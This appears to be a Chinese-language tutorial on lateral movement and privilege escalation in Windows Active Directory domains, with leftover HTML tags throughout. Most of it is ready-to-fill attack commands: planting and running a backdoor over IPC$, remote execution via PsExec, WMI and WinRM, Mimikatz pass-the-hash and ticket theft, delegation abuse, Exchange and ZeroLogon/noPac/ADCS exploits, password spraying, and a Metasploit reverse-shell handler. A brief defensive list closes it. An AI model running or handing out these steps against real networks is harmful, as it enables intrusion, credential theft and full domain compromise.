内网横向移动技术全面指南<\/h1>

1. 域内\/域外用户判断<\/h2>

1.1 判断当前权限类型<\/h3>

域内用户<\/strong>：能够执行域查询命令并获取正常回显
net user \/domain <\/span><\/span><\/code><\/pre><\/li> 域外用户<\/strong>：无法正常执行域查询命令<\/li> <\/ul> 1.2 域外用户利用方法<\/h3> 提权到SYSTEM<\/strong>：SYSTEM权限在域内具有更高权限<\/li> 切换用户<\/strong>：通过Mimikatz抓取明文密码，尝试其他用户上线<\/li> 枚举域内用户<\/strong>： kerbrute_windows_amd64.exe userenum --dc [IP] -d [域名] [字典文件] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. 横向移动技术分类<\/h2> 2.1 基于口令凭据<\/h3> 协议类型<\/strong>： IPC<\/li> SMB<\/li> WMI<\/li> DCOM<\/li> WinRS\/WinRM<\/li> RDP<\/li> <\/ul> <\/li> 认证方式<\/strong>： PTH (Pass the Hash)<\/li> PTT (Pass the Ticket)<\/li> PTK (Pass the Key)<\/li> <\/ul> <\/li> <\/ul> 2.2 基于漏洞<\/h3> 域控提权漏洞<\/li> Exchange漏洞<\/li> <\/ul> 2.3 基于配置<\/h3> 委派攻击<\/li> DCSync<\/li> ASREP Roasting<\/li> Kerberos攻击<\/li> NTLM Relay<\/li> <\/ul> 3. 具体横向移动技术详解<\/h2> 3.1 IPC$共享利用<\/h3> 利用条件<\/strong>：<\/p> 目标系统为NT及以上<\/li> 开启IPC$共享<\/li> 139\/445端口开放<\/li> 有效的账号密码<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 建立IPC连接： net use \\[目标IP]\ipc$ "[密码]"<\/span> \/user:[用户名] <\/span><\/span><\/code><\/pre><\/li> 拷贝后门文件： copy<\/span> [后门文件] \\[目标IP]\c$\ <\/span><\/span><\/code><\/pre><\/li> 创建计划任务执行： at \\[目标IP] [时间] cmd \/c "c:\后门.exe"<\/span> <\/span><\/span><\/code><\/pre><\/li> 删除IPC连接： net use \\[目标IP]\ipc$ \/del <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.2 SMB利用<\/h3> 利用条件<\/strong>：<\/p> 文件与打印机服务开启<\/li> 防火墙允许135\/445端口通信<\/li> 知道目标账户密码或Hash<\/li> <\/ul> 利用工具<\/strong>：<\/p> PsExec<\/strong>： PsExec.exe \\[目标IP] -u [用户] -p [密码] -s cmd <\/span><\/span><\/code><\/pre><\/li> smbexec(Impacket)<\/strong>： python smbexec.<\/span>py [用户]:[密码]@<\/span>[目标IP] <\/span><\/span><\/code><\/pre><\/li> CS插件<\/strong>：cs-psexec<\/li> <\/ol> 3.3 WMI利用<\/h3> 利用条件<\/strong>：<\/p> WMI服务开启(135端口)<\/li> 防火墙允许135\/445端口通信<\/li> 知道目标账户密码或Hash<\/li> <\/ul> 利用方法<\/strong>：<\/p> WMIC命令<\/strong>： wmic \/node:[目标IP] \/user:[用户] \/password:[密码] process call create "cmd \/c [命令]"<\/span> <\/span><\/span><\/code><\/pre><\/li> Impacket套件<\/strong>： python wmiexec.<\/span>py [用户]:[密码]@<\/span>[目标IP] <\/span><\/span><\/code><\/pre><\/li> CS插件<\/strong>：wmihacker<\/li> <\/ol> 3.4 DCOM利用<\/h3> 利用条件<\/strong>：<\/p> 目标为Win7及以上系统<\/li> 管理员权限<\/li> 远程主机防火墙未阻止<\/li> <\/ul> 利用工具<\/strong>：<\/p> python dcomexec.<\/span>py [用户]:[密码]@<\/span>[目标IP] <\/span><\/span><\/code><\/pre>3.5 WinRM\/WinRS利用<\/h3> 利用条件<\/strong>：<\/p> Win2012之前需手动开启WinRM<\/li> 防火墙开放5985\/5986端口<\/li> <\/ul> 利用方法<\/strong>：<\/p> 探针可用性： winrm enumerate winrm\/config\/listener <\/span><\/span><\/code><\/pre><\/li> 执行命令： winrs -r:[目标IP] -u:[用户] -p:[密码] "cmd.exe \/c [命令]"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.6 RDP利用<\/h3> 利用条件<\/strong>：<\/p> 目标开启RDP服务(3389端口)<\/li> <\/ul> 利用方法<\/strong>：<\/p> 端口转发映射<\/strong>：使用冰蝎等工具建立HTTP隧道<\/li> <\/ul> <\/li> Socks代理<\/strong>：建立Socks节点后使用mstsc连接<\/li> <\/ul> <\/li> SharpRDP工具<\/strong>： SharpRDP.exe computername=[目标IP] command="[命令]"<\/span> username=[用户] password=[密码] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 认证攻击技术<\/h2> 4.1 PTH (Pass the Hash)<\/h3> 利用方法<\/strong>：<\/p> 直接Hash传递<\/strong>： mimikatz "sekurlsa::pth \/user:[用户] \/domain:[域] \/ntlm:[NTLM Hash]"<\/span> <\/span><\/span><\/code><\/pre><\/li> Impacket套件<\/strong>： python [工具].<\/span>py -<\/span>hashes :[NTLM Hash] [用户]@<\/span>[目标IP] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.2 PTT (Pass the Ticket)<\/h3> 利用工具<\/strong>：<\/p> MS14-068漏洞利用<\/strong>： MS14-068.exe -u [用户]@[域] -p [密码] -s [用户SID] -d [DC IP] <\/span><\/span><\/code><\/pre><\/li> Kekeo工具<\/strong>： kekeo "tgs::s4u \/tgt:[TGT文件] \/user:[目标用户] \/service:[服务]"<\/span> <\/span><\/span><\/code><\/pre><\/li> 历史票据利用<\/strong>： mimikatz "kerberos::list \/export"<\/span> <\/span><\/span>mimikatz "kerberos::ptt [票据文件]"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.3 PTK (Pass the Key)<\/h3> 利用条件<\/strong>：<\/p> 系统安装KB2871997补丁<\/li> 禁用NTLM认证<\/li> <\/ul> 利用方法<\/strong>：<\/p> mimikatz "sekurlsa::ekeys"<\/span> <\/span><\/span>mimikatz "sekurlsa::pth \/user:[用户] \/domain:[域] \/aes256:[AES Key]"<\/span> <\/span><\/span><\/code><\/pre>5. 委派攻击<\/h2> 5.1 非约束委派<\/h3> 利用条件<\/strong>：<\/p> 机器账户配置"信任此计算机来委派任何服务"<\/li> <\/ul> 利用方法<\/strong>：<\/p> 诱使域管理员访问<\/strong>：主动：net use \\[目标]<\/code><\/li> 被动：钓鱼页面诱导访问<\/li> <\/ul> <\/li> 结合打印机漏洞<\/strong>： Rubeus.exe monitor \/interval:2 \/filteruser:dc$ >hash.txt <\/span><\/span>SpoolSample.exe [DC] [监听主机] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5.2 约束委派<\/h3> 利用条件<\/strong>：<\/p> 机器账户配置"仅信任此计算机来委派指定服务"<\/li> <\/ul> 利用方法<\/strong>：<\/p> 使用Kekeo工具<\/strong>： kekeo "tgs::s4u \/tgt:[TGT文件] \/user:[目标用户] \/service:[服务]"<\/span> <\/span><\/span><\/code><\/pre><\/li> 使用Impacket套件<\/strong>： python getST.<\/span>py -<\/span>dc-<\/span>ip [DC IP] [域]\/<\/span>[机器账户]$<\/span>:[密码] -<\/span>spn [服务SPN] -<\/span>impersonate [目标用户] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5.3 基于资源的约束委派(RBCD)<\/h3> 利用条件<\/strong>：<\/p> 同一域用户加入多台主机(SID一致)<\/li> 或用户属于Account Operators组<\/li> <\/ul> 利用方法<\/strong>：<\/p> 创建机器账户<\/strong>： Import-Module .\Powermad.ps1 <\/span><\/span>New-MachineAccount -MachineAccount [新机器名<\/span>] -Password $(ConvertTo-SecureString '密码'<\/span> -AsPlainText -Force) <\/span><\/span><\/code><\/pre><\/li> 修改目标主机委派属性<\/strong>： $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;[SID])"<\/span> <\/span><\/span>$SDBytes = New-Object byte[] ($SD.BinaryLength) <\/span><\/span>$SD.GetBinaryForm($SDBytes, 0) <\/span><\/span>Get-DomainComputer [目标主机<\/span>] | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'<\/span>=$SDBytes} <\/span><\/span><\/code><\/pre><\/li> 申请访问票据<\/strong>： python getST.<\/span>py -<\/span>dc-<\/span>ip [DC IP] [域]\/<\/span>[新机器账户]$<\/span>:[密码] -<\/span>spn [服务SPN] -<\/span>impersonate [目标用户] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6. Exchange服务攻击<\/h2> 6.1 信息收集<\/h3> 端口扫描<\/strong>：80(OWA),443(ECP),25\/587\/2525(SMTP)<\/li> SPN扫描<\/strong>： setspn -T [域<\/span>] -q *\/* <\/span><\/span><\/code><\/pre><\/li> 版本探测<\/strong>： python Exchange_GetVersion_MatchVul.<\/span>py [IP] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6.2 漏洞利用<\/h3> ProxyShell(CVE-2021-34473,34523,31207)<\/strong>： python proxyshell.<\/span>py -<\/span>u [用户] -<\/span>p [密码] --<\/span>host [Exchange IP] <\/span><\/span><\/code><\/pre><\/li> CVE-2020-17144<\/strong>： CVE-2020-17144.exe -u [用户] -p [密码] -d [域] -c [DC] --target [Exchange IP] <\/span><\/span><\/code><\/pre><\/li> CVE-2020-0688<\/strong>： python CVE-<\/span>2020<\/span>-<\/span>0688.<\/span>py [Exchange URL] [用户] [密码] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 7. 域控提权漏洞<\/h2> 7.1 CVE-2020-1472 (ZeroLogon)<\/h3> 利用步骤<\/strong>：<\/p> 检测漏洞<\/strong>： python zerologon_tester.<\/span>py [DC名称] [DC IP] <\/span><\/span><\/code><\/pre><\/li> 清空凭证<\/strong>： python cve-<\/span>2020<\/span>-<\/span>1472<\/span>-<\/span>exploit.<\/span>py [DC名称] [DC IP] <\/span><\/span><\/code><\/pre><\/li> 获取域Hash<\/strong>： python secretsdump.<\/span>py [域]\/<\/span>[DC名称]\$<\/span>@<\/span>[DC IP] -<\/span>no-<\/span>pass<\/span> <\/span><\/span><\/code><\/pre><\/li> 恢复密码<\/strong>： python reinstall_original_pw.<\/span>py [DC名称] [DC IP] [原始Hash] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 7.2 CVE-2021-42287\/42278<\/h3> 利用工具<\/strong>：<\/p> python noPac.<\/span>py -<\/span>use-<\/span>ldap "[域]\/[用户]:[密码]"<\/span> -<\/span>dc-<\/span>ip [DC IP] -<\/span>shell <\/span><\/span><\/code><\/pre>7.3 CVE-2022-26923 (ADCS攻击)<\/h3> 利用步骤<\/strong>：<\/p> 查找易受攻击模板<\/strong>： python certipy-<\/span>ad find -<\/span>u [用户]@<\/span>[域] -<\/span>p [密码] -<\/span>dc-<\/span>ip [DC IP] -<\/span>vulnerable <\/span><\/span><\/code><\/pre><\/li> 创建机器账户<\/strong>： python bloodyAD.<\/span>py -<\/span>d [域] -<\/span>u [用户] -<\/span>p [密码] --<\/span>host [DC IP] addComputer [机器名] [密码] <\/span><\/span><\/code><\/pre><\/li> 设置机器属性<\/strong>： python bloodyAD.<\/span>py -<\/span>d [域] -<\/span>u [用户] -<\/span>p [密码] --<\/span>host [DC IP] setAttribute 'CN=[机器名],CN=Computers,DC=[域]'<\/span> dNSHostName '["DC名称"]'<\/span> <\/span><\/span><\/code><\/pre><\/li> 申请证书<\/strong>： python certipy-<\/span>ad req -<\/span>username '[机器名]$@[域]'<\/span> -<\/span>password '[密码]'<\/span> -<\/span>ca [CA名称] -<\/span>template Machine -<\/span>debug <\/span><\/span><\/code><\/pre><\/li> 获取域控权限<\/strong>： python wmiexec.<\/span>py -<\/span>hashes :[NTLM Hash] [域]\/<\/span>administrator@<\/span>[DC IP] <\/span><\/span><\/code><\/pre><\/li> <\/ol> 8. 自动化工具<\/h2> 8.1 CrackMapExec<\/h3> 密码喷射<\/strong>：<\/p> proxychains crackmapexec smb [<\/span>IP范围]<\/span> -u [<\/span>用户]<\/span> -p [<\/span>密码]<\/span> --local-auth -x "[命令]"<\/span> <\/span><\/span><\/code><\/pre>8.2 Impacket套件<\/h3> 包含多种横向移动工具：<\/p> atexec.py<\/li> smbexec.py<\/li> wmiexec.py<\/li> dcomexec.py<\/li> 等<\/li> <\/ul> 8.3 MSF与CS联动<\/h3> CS设置监听器<\/strong>：反弹到MSF<\/li> MSF接收会话<\/strong>： use exploit\/multi\/handler <\/span><\/span>set payload windows\/meterpreter\/reverse_http <\/span><\/span>set LHOST [<\/span>IP]<\/span> <\/span><\/span>set LPORT [<\/span>端口]<\/span> <\/span><\/span>exploit <\/span><\/span><\/code><\/pre><\/li> CS执行<\/strong>：spawn msf<\/code><\/li> <\/ol> 9. 防御建议<\/h2> 限制横向移动协议<\/strong>：<\/p> 禁用不必要的协议(如SMBv1)<\/li> 限制RDP、WinRM等远程管理服务的访问<\/li> <\/ul> <\/li> 强化认证安全<\/strong>：<\/p> 启用LSA保护<\/li> 禁用NTLM认证<\/li> 启用Credential Guard<\/li> <\/ul> <\/li> 监控与检测<\/strong>：<\/p> 监控异常的计划任务创建<\/li> 检测异常的票据请求<\/li> 监控敏感注册表键值修改<\/li> <\/ul> <\/li> 补丁管理<\/strong>：<\/p> 及时安装安全补丁<\/li> 重点关注域控和Exchange服务器<\/li> <\/ul> <\/li> 最小权限原则<\/strong>：<\/p> 限制域用户权限<\/li> 严格控制委派设置<\/li> 定期审计账户权限<\/li> <\/ul> <\/li> <\/ol>